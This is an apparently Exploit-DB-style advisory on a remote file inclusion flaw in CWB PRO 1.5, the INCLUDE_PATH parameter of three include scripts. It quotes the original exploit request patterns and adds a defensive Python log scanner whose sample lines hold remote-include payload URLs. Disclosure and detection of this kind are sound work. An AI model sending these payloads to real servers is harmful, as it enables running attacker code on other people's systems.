Vendor: CWB PRO
By: GloD_M = [Mahmood_ali]
CVSS: N/A
Severity: HIGH
Type: Remote File Inclusion
CWE: 98
Product Name: CWB PRO
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Year: 2007

CWB PRO Version 1.5 (INCLUDE_PATH) Remote File Include Vulnerabilities

CWB PRO version 1.5 has a remote file inclusion vulnerability in the INCLUDE_PATH parameter of the include/cls_headline_prod.php, include/cls_listorders.php, and include/cls_viewpastorders.php scripts, which allows remote attackers to include arbitrary files from a remote server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# CWB PRO Version 1.5 (INCLUDE_PATH) Remote File Include Vulnerabilities
# D.Script: http://codewalkers.com/codefiles/373_cwbs1.5_demo.zip 
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/include/cls_headline_prod.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_listorders.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_viewpastorders.php?INCLUDE_PATH=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-01]
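
A defender-side check for the three request patterns listed above, as an added example that is not part of the original advisory or of CWB PRO: it scans web-server access logs for requests that set INCLUDE_PATH on the affected scripts. The common/combined log format, the verdict labels and the sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The three scripts the advisory names as reading INCLUDE_PATH from the request.
AFFECTED = {"cls_headline_prod.php", "cls_listorders.php", "cls_viewpastorders.php"}
# Assumed log layout: Apache/nginx common or combined format.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A decoded value that starts with "scheme:" (http, https, ftp, ...) is remote.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]+:", re.I)

def classify(line):
    """Return a finding for a request setting INCLUDE_PATH on an affected script, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    script = unquote(url.path).rsplit("/", 1)[-1]
    if script not in AFFECTED:
        return None
    # parse_qs URL-decodes values, so %68ttp%3A%2F%2F... is seen as http://...
    values = parse_qs(url.query, keep_blank_values=True).get("INCLUDE_PATH")
    if values is None:
        return None
    remote = any(SCHEME.match(v) for v in values)
    return {
        "client": client,
        "script": script,
        "status": int(status),
        # Assumption: legitimate clients never send INCLUDE_PATH, so report any value.
        "verdict": "remote-include" if remote else "request-supplied-path",
    }

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Apr/2007:10:00:01 +0000] "GET /shop/include/cls_listorders.php?INCLUDE_PATH=http://remote.example/x.txt HTTP/1.1" 200 512
192.0.2.11 - - [01/Apr/2007:10:00:05 +0000] "GET /shop/include/cls_headline_prod.php?INCLUDE_PATH=%68ttp%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 498
192.0.2.12 - - [01/Apr/2007:10:01:00 +0000] "GET /shop/include/cls_viewpastorders.php?INCLUDE_PATH=/srv/shop/include/ HTTP/1.1" 404 210
192.0.2.13 - - [01/Apr/2007:10:02:00 +0000] "GET /shop/index.php?page=orders HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the request line, so this covers INCLUDE_PATH passed in the URL, as in the patterns above.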